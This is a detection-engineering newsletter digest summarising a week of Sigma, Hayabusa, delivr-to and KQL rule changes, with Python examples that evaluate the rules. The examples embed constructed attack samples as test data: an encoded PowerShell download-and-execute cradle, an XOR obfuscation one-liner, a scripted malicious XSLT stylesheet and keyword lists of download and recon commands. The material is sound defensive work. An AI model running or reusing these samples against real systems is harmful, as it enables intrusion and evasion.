This edition highlights detection rule changes from 4 GitHub repositories (out of 40+ monitored) between Dec 9 and Dec 16, 2024.
In this period, 6 new rules were added, and 7 were updated. We focus only on medium, high, or critical impact changes to bring you the most relevant updates.
Stay informed on the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Points
This week's rule changes extend coverage in two directions. The high-severity addition targets exploitation attempts against Cleo software (CVE-2024-50623), catching cmd.exe spawned from the Cleo process with suspicious PowerShell command lines. The medium-impact additions cover bXOR-based obfuscation in PowerShell command lines, an evasion technique that attackers use instead of Base64 encoding. The net effect is more detection breadth; because several of the changes widen trigger criteria, expect higher alert volumes and plan for tuning.
A new rule detecting exploitation attempts against Cleo's CVE-2024-50623 addresses an emerging threat: cmd.exe launched by Cleo software with encoded or download-style PowerShell command lines. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)
New rules flag the bxor operator in PowerShell command lines, an obfuscation technique used as an alternative to Base64 encoding, improving visibility of evasive PowerShell in Windows environments. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)
The Linux suspicious process termination rule now also covers 'xkill', widening the set of process-termination tools whose misuse it detects. (SigmaHQ/sigma)
The webshell reconnaissance rules gained additional PowerShell command-line indicators and execution conditions, broadening detection of reconnaissance launched from web server processes. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)
A new rule covers Office document attachments that use XSLT stylesheet scripting, reducing false negatives for phishing and malware delivered by email. (delivr-to/detections)
A new hunting query detects the loading or creation of drivers on Microsoft's recommended driver block list, helping catch defense evasion via vulnerable drivers in environments monitored with Microsoft Defender. (Cyb3r-Monk/Threat-Hunting-and-Detection)
Corporate repositories (3)
SigmaHQ/sigma (2 added, 2 modified)
Two rules were added: a high-impact rule for CVE-2024-50623 exploitation attempts against Cleo software, and a medium-impact rule for bXOR usage in PowerShell command lines. Two rules were modified: the Linux suspicious process termination rule (now covering xkill, with its level raised from low to medium) and the webshell reconnaissance rule (additional PowerShell command-line indicators). An older rule on PowerShell XOR use was removed in the same change, consolidating that coverage into the new bXOR rule.
➕ New rules
CVE-2024-50623 Exploitation Attempt - Cleo
Coverage change | High impact | Source
New rule added to detect exploitation attempts of CVE-2024-50623 involving Cleo software. The rule monitors for 'cmd.exe' processes spawned via Cleo software with suspicious PowerShell command lines, such as encoded or download commands.
bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
ThreatIntelligence change | Medium impact | Source
Introduced a new rule to identify the bXOR operator in PowerShell command lines, an obfuscation tactic attackers use to hide strings as an alternative to Base64 encoding. Because the rule reads the command line as logged, a -bxor that only appears inside an -EncodedCommand payload will not match; pair it with encoded-command detections. The operator also appears in legitimate scripts (checksums, bit manipulation), so expect some tuning.
✎ Modified rules
Linux Suspicious Process Termination via Kill
Coverage change | Medium impact | Source
The rule now also detects 'xkill', extending the range of process termination tools it covers. The level was raised from low to medium, reflecting that these are legitimate tools frequently misused to terminate processes an attacker wants out of the way.
Webshell Recon Commands and Processes
CoverageIncrease change | Medium impact | Source
Expanded detection to include additional PowerShell command-line patterns, such as hidden-window execution flags and command structures typical of a webshell launching PowerShell.
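The four Sigma rules above (the new Cleo and bXOR rules and the modified Linux kill and webshell reconnaissance rules) all reduce to substring selections over process-creation fields. The Python below is an added example, not the published rules or any SigmaHQ code: it evaluates simplified approximations of the four rules with Sigma's case-insensitive contains/endswith semantics over constructed events, then shows why the bXOR rule needs the decoded script as well, since a -bxor hidden inside an -EncodedCommand payload never appears in the raw command line. The field values in RULES (Cleo folder names, the kill flags, the web server parents) are assumptions that approximate the prose.

```python
import base64

# Minimal Sigma-style evaluation: matching is case-insensitive, '|contains' and
# '|endswith' mirror Sigma's modifiers, a list of values is an OR, the keys of a
# selection are ANDed, and a rule fires when all of its selections match.
def _field_match(event, key, needle):
    field, _, modifier = key.partition("|")
    value, needle = str(event.get(field, "")).lower(), str(needle).lower()
    if modifier == "contains":
        return needle in value
    if modifier == "endswith":
        return value.endswith(needle)
    return value == needle

def _selection_match(event, selection):
    for key, needles in selection.items():
        needles = needles if isinstance(needles, list) else [needles]
        if not any(_field_match(event, key, n) for n in needles):
            return False
    return True

# Approximations of the four rules discussed above. Assumptions: Cleo products run
# from folders named after the product, the Linux rule keys on kill binaries plus a
# forceful flag, and the webshell rule keys on web server parent processes.
RULES = {
    "CVE-2024-50623 Exploitation Attempt - Cleo": {
        "level": "high",
        "parent": {"ParentImage|contains": ["\\Harmony\\", "\\VLTrader\\", "\\LexiCom\\"]},
        "image": {"Image|endswith": "\\cmd.exe"},
        "cli": {"CommandLine|contains": ["powershell", "pwsh"]},
        "susp": {"CommandLine|contains": [" -enc", " -e ", "-encodedcommand",
                                          "downloadstring", "downloadfile", "invoke-webrequest"]},
    },
    "bXOR Operator Usage In PowerShell Command Line": {
        "level": "medium",
        "cli": {"CommandLine|contains": "-bxor"},
    },
    "Linux Suspicious Process Termination via Kill": {
        "level": "medium",  # raised from low when xkill was added
        "image": {"Image|endswith": ["/kill", "/pkill", "/killall", "/xkill"]},
        "susp": {"CommandLine|contains": ["-9", "-KILL", "-SIGKILL", "-all"]},
    },
    "Webshell Recon Commands and Processes": {
        "level": "medium",
        "parent": {"ParentImage|endswith": ["\\w3wp.exe", "\\httpd.exe", "\\nginx.exe", "\\php-cgi.exe"]},
        "image": {"Image|endswith": ["\\cmd.exe", "\\powershell.exe", "\\pwsh.exe"]},
        "cli": {"CommandLine|contains": ["whoami", "ipconfig", "net user", "systeminfo",
                                         "-windowstyle hidden", " -w hidden", " -nop "]},
    },
}

def match_rules(event):
    """Return (rule name, level) for every rule whose selections all match."""
    hits = []
    for name, rule in RULES.items():
        selections = [sel for key, sel in rule.items() if key != "level"]
        if all(_selection_match(event, sel) for sel in selections):
            hits.append((name, rule["level"]))
    return hits

def decode_encoded_command(cmdline):
    """Return the script behind -enc/-EncodedCommand (Base64 of UTF-16LE), or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-e", "-ec", "-enc", "-encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def match_rules_deep(event):
    """Evaluate the rules on the decoded script as well: the bXOR rule reads the raw
    command line, so a '-bxor' wrapped in an encoded command never reaches it."""
    hits = dict(match_rules(event))
    decoded = decode_encoded_command(event.get("CommandLine", ""))
    if decoded:
        hits.update(match_rules({**event, "CommandLine": decoded}))
    return sorted(hits.items())

def _enc(script):
    return base64.b64encode(script.encode("utf-16-le")).decode()

XOR_ONE_LINER = "-join([char[]]'CWR'|%{[char]([int]$_ -bxor 0x2a)})"
EVENTS = [  # constructed process-creation events, not real telemetry
    {"ParentImage": r"C:\Harmony\jre\bin\javaw.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell.exe -NonInteractive -enc "
                    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/s.ps1')")},
    {"ParentImage": r"C:\Harmony\jre\bin\javaw.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell.exe -enc " + _enc(XOR_ONE_LINER)},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f'powershell.exe -c "{XOR_ONE_LINER}"'},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden whoami /all"},
    {"ParentImage": "/usr/bin/bash", "Image": "/usr/bin/xkill", "CommandLine": "xkill -all"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["CommandLine"][:48].ljust(48), "->", match_rules_deep(ev))
```

The second event is the interesting one: the raw command line trips only the Cleo rule, and the bXOR rule fires only after the -enc payload is decoded. In a real pipeline that decoding step belongs in the log enrichment, not in the rule, because Sigma selections cannot transform field values.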
delivr-to/detections (1 added)
The newly added rule 'Attachment: Office Stylesheet Scripting' detects potentially malicious documents that use XSLT stylesheet scripting. It identifies threats embedded in Office attachments by inspecting file extensions, specific script content, and sender profile. The change extends coverage against a less common email malware delivery method and is marked medium impact.
➕ New rules
Attachment: Office Stylesheet Scripting
Coverage change | Medium impact | Source
This new rule detects potentially malicious Office documents that use XSLT stylesheet scripting (msxsl:script blocks, which let a stylesheet run VBScript or JScript when MSXML transforms it). It examines attachments with specific file types and extensions, scanning the document's content for scripting indicators. The rule uses YARA flavors to identify VBScript content and looks for specific MSXML calls such as 'transformNodeToObject' and 'LoadXML'. It also considers sender profiles, flagging emails from domains previously seen sending malicious mail.
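As an added illustration of the checks that paragraph describes (not the delivr-to rule itself, which is written in Sublime's MQL and runs on exploded attachments), the Python below scans an XML or XSLT attachment for msxsl:script blocks and the MSXML calls named above, falls back to a regex so that a document the strict parser rejects still gets inspected, and records a previously flagged sender domain as additional context. The file-extension list, the extra indicators CreateObject and WScript.Shell, and the sample stylesheets are assumptions constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"
SCRIPT_LANGS = {"vbscript", "jscript", "javascript"}
# The two MSXML DOM methods the rule looks for, plus two common companions (assumption).
INDICATORS = ("transformNodeToObject", "LoadXML", "CreateObject", "WScript.Shell")
# Assumption: Office packages were already exploded into their XML parts upstream,
# so only raw XML/XSLT file names reach this check.
ATTACHMENT_EXTENSIONS = (".xsl", ".xslt", ".xml")


def find_script_blocks(content):
    """Return (language, script_text) for every msxsl:script element.
    The language defaults to JScript when the attribute is absent (MSXML behaviour)."""
    try:
        root = ET.fromstring(content.encode())
    except ET.ParseError:
        # A strict parser rejecting the file must not hide the script block:
        # fall back to a regex over the raw text.
        blocks = []
        pattern = r"<msxsl:script\b([^>]*)>(.*?)</msxsl:script>"
        for attrs, body in re.findall(pattern, content, re.I | re.S):
            lang = re.search(r"language\s*=\s*[\"']([^\"']+)", attrs, re.I)
            blocks.append((lang.group(1) if lang else "JScript", body))
        return blocks
    return [(el.get("language", "JScript"), "".join(el.itertext()))
            for el in root.iter(f"{{{MSXSL_NS}}}script")]


def classify_attachment(filename, content, sender_domain, known_bad_domains=frozenset()):
    """Return (flagged, reasons). Flags XML/XSLT attachments whose script block calls
    the MSXML methods above; a sender seen as malicious before is added as context."""
    reasons = []
    if not filename.lower().endswith(ATTACHMENT_EXTENSIONS):
        return False, reasons
    for lang, body in find_script_blocks(content):
        hits = [ind for ind in INDICATORS if re.search(re.escape(ind), body, re.I)]
        if lang.lower() in SCRIPT_LANGS and hits:
            reasons.append(f"{lang} msxsl:script calls {', '.join(hits)}")
    if reasons and sender_domain.lower() in known_bad_domains:
        reasons.append(f"sender domain {sender_domain} previously flagged")
    return bool(reasons), reasons


# Constructed samples: a plain transform, a scripted one, and the scripted one
# with a missing closing tag so that strict parsing fails.
BENIGN_XSL = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><html><body><xsl:value-of select="//title"/></body></html></xsl:template>
</xsl:stylesheet>"""

MALICIOUS_XSL = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:user">
  <msxsl:script language="VBScript" implements-prefix="user"><![CDATA[
    Function Run()
      Set doc = CreateObject("Msxml2.DOMDocument.6.0")
      doc.LoadXML "<root/>"
      doc.transformNodeToObject style, out
      Run = "done"
    End Function
  ]]></msxsl:script>
  <xsl:template match="/"><xsl:value-of select="user:Run()"/></xsl:template>
</xsl:stylesheet>"""

BROKEN_XSL = MALICIOUS_XSL.replace("</xsl:template>", "")

if __name__ == "__main__":
    for name, doc in (("report.xsl", BENIGN_XSL), ("invoice.xsl", MALICIOUS_XSL), ("invoice.xslt", BROKEN_XSL)):
        print(name, classify_attachment(name, doc, "evil.example", {"evil.example"}))
```

The regex fallback matters more than it looks: a stylesheet that a conformant parser refuses is exactly the kind of file an attacker might send, and a detection that silently returns nothing on a parse error is a false negative rather than an error.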
Yamato-Security/hayabusa-rules (2 added, 2 modified)
Two rules were added, for bXOR usage in PowerShell command lines and for CVE-2024-50623 exploitation attempts, both classified as high impact because they add coverage for an obfuscation technique and a specific exploit respectively. The two webshell reconnaissance rules (process creation and Sysmon process creation) were modified with additional PowerShell command-line indicators; the broader trigger conditions may raise alert volume and analyst workload.
➕ New rules
bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
Coverage change | High impact | Source
A new rule targeting the detection of bxor usage in PowerShell command lines, indicating potentially obfuscated commands typically used by adversaries for evasion.
CVE-2024-50623 Exploitation Attempt - Cleo
Coverage change | High impact | Source
Introduces a new rule detecting exploitation attempts of Cleo's CVE-2024-50623 using suspicious command-line activities associated with cmd.exe and PowerShell commands originating from the Cleo software suite.
✎ Modified rules
Process Creation Webshell Recon Commands and Processes
Coverage change | Medium impact | Source
Enhanced detection logic by adding new command-line indicators for suspicious PowerShell usage and extending the executor list to include 'pwsh.exe'. The modification also tightens the conditions that match encoded and obfuscated commands.
Sysmon Process Creation Webshell Recon Commands and Processes
Coverage change | Medium impact | Source
Expanded detection criteria to cover PowerShell launched with obfuscation flags from a web server process, now including specific command-line patterns and executors (e.g. 'cmd.exe', 'pwsh.exe').
Personal repositories (1)
Cyb3r-Monk/Threat-Hunting-and-Detection (1 added)
A new rule, 'Microsoft Recommended Driver Block List', was added. It covers the loading of drivers on Microsoft's vulnerable-driver block list, the bring-your-own-vulnerable-driver defense-evasion technique in which an attacker loads a signed but exploitable driver to gain kernel access and disable security tooling. Detecting these drivers at load or staging time closes a gap that endpoint protection operating only in user mode cannot.
➕ New rules
Microsoft Recommended Driver Block List
Coverage change | Medium impact | Source
The rule is a KQL query (the Kusto query language shared by Microsoft Sentinel and Defender advanced hunting) for MDE/M365D that detects the loading or creation of drivers listed in Microsoft's recommended driver block rules, reading the DeviceEvents (driver load) and DeviceFileEvents (file creation) tables. A hit on a file creation is early warning that a vulnerable driver has been staged; a hit on a driver load means it is already running in the kernel.
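The query itself is KQL and is not reproduced here. As an added Python example, not code from the repository, the block below does the equivalent offline: it parses a constructed, cut-down block list in the shape of a WDAC SiPolicy FileRules section into hash and file-name/version lookups, then runs DriverLoad and FileCreated rows (constructed, with MDE-style column names) through them. The policy structure, the deny-by-version semantics and the FileVersion field on the events are assumptions noted in the comments.

```python
import xml.etree.ElementTree as ET

SIPOLICY_NS = "urn:schemas-microsoft-com:sipolicy"

# Constructed, cut-down denylist in the shape of a WDAC SiPolicy FileRules section.
# Assumptions: Deny entries carry either a Hash or a FileName with
# MinimumFileVersion, and a Deny rule blocks every version up to and including
# that value (so 65535.65535.65535.65535 means "all versions"). Signer-based
# rules in the real list are not modelled. IDs, names and hashes are made up.
POLICY_XML = """<?xml version="1.0"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <FileRules>
    <Deny ID="ID_DENY_EX1_SHA256" FriendlyName="example1.sys Hash Sha256"
          Hash="00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff"/>
    <Deny ID="ID_DENY_EX1_SHA1" FriendlyName="example1.sys Hash Sha1"
          Hash="0123456789abcdef0123456789abcdef01234567"/>
    <Deny ID="ID_DENY_EX2" FriendlyName="example2.sys FileAttribute"
          FileName="example2.sys" MinimumFileVersion="65535.65535.65535.65535"/>
    <Deny ID="ID_DENY_EX3" FriendlyName="example3.sys FileAttribute"
          FileName="example3.sys" MinimumFileVersion="2.0.0.0"/>
  </FileRules>
</SiPolicy>
"""


def version_tuple(version):
    """'10.0.1.5' -> (10, 0, 1, 5) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def load_blocklist(policy_xml):
    """Return (hashes, name_rules): lowercase hex digests, and file name -> highest blocked version."""
    root = ET.fromstring(policy_xml.encode())
    hashes, name_rules = set(), {}
    for deny in root.iter(f"{{{SIPOLICY_NS}}}Deny"):
        if deny.get("Hash"):
            hashes.add(deny.get("Hash").lower())
        elif deny.get("FileName"):
            max_blocked = deny.get("MinimumFileVersion", "65535.65535.65535.65535")
            name_rules[deny.get("FileName").lower()] = version_tuple(max_blocked)
    return hashes, name_rules


def blocked_reason(event, hashes, name_rules):
    """Hash match first (catches renamed drivers), then file name plus version. None when clean."""
    for field in ("SHA256", "SHA1"):
        if event.get(field, "").lower() in hashes:
            return f"{field} on block list"
    name = event.get("FileName", "").lower()
    if name in name_rules:
        # Assumption: FileVersion has been enriched onto the event; it is not a
        # native DeviceEvents/DeviceFileEvents column.
        version = version_tuple(event.get("FileVersion", "0.0.0.0"))
        if version <= name_rules[name]:
            return f"{name} version {event.get('FileVersion', '?')} within blocked range"
    return None


def hunt(events, policy_xml=POLICY_XML):
    """Mirror the query's two legs: DriverLoad in DeviceEvents (already in the
    kernel) and FileCreated in DeviceFileEvents (staged, not yet loaded)."""
    hashes, name_rules = load_blocklist(policy_xml)
    wanted = {("DeviceEvents", "DriverLoad"), ("DeviceFileEvents", "FileCreated")}
    findings = []
    for event in events:
        if (event["Table"], event["ActionType"]) not in wanted:
            continue
        reason = blocked_reason(event, hashes, name_rules)
        if reason:
            findings.append((event["Table"], event["ActionType"], event["FileName"], reason))
    return findings


EVENTS = [  # constructed rows with MDE-style column names, not real telemetry
    {"Table": "DeviceEvents", "ActionType": "DriverLoad", "FileName": "renamed.sys",
     "SHA256": "00112233445566778899AABBCCDDEEFF00112233445566778899AABBCCDDEEFF", "FileVersion": "1.0.0.0"},
    {"Table": "DeviceEvents", "ActionType": "DriverLoad", "FileName": "Example2.sys",
     "SHA256": "ff" * 32, "FileVersion": "10.2.0.0"},
    {"Table": "DeviceFileEvents", "ActionType": "FileCreated", "FileName": "example3.sys",
     "SHA256": "ee" * 32, "FileVersion": "1.9.0.0"},
    {"Table": "DeviceFileEvents", "ActionType": "FileCreated", "FileName": "example3.sys",
     "SHA256": "dd" * 32, "FileVersion": "2.1.0.0"},
    {"Table": "DeviceFileEvents", "ActionType": "FileDeleted", "FileName": "example2.sys",
     "SHA256": "cc" * 32, "FileVersion": "1.0.0.0"},
    {"Table": "DeviceEvents", "ActionType": "DriverLoad", "FileName": "clean.sys",
     "SHA256": "bb" * 32, "FileVersion": "3.0.0.0"},
]

if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(finding)
```

Two details carry over to the real query: hashes must be compared case-insensitively (the block list and the telemetry do not agree on case), and the first event shows why hash rules matter even when a name rule exists, since a renamed copy of a listed driver only matches by digest.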
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include, we’d love to hear from you. Reach out to us at team@rulecheck.io. We value your feedback and are committed to making this resource better for the detection engineering community.
Powered by
This digest is brought to you in collaboration with BlackStork.io, combining their content generation tech with our detection engineering expertise to deliver timely, high-quality updates straight to your inbox.
Are you looking for a customized version of the newsletter or interested in licensing your own hosted instance? We’d be happy to help — reach out to us.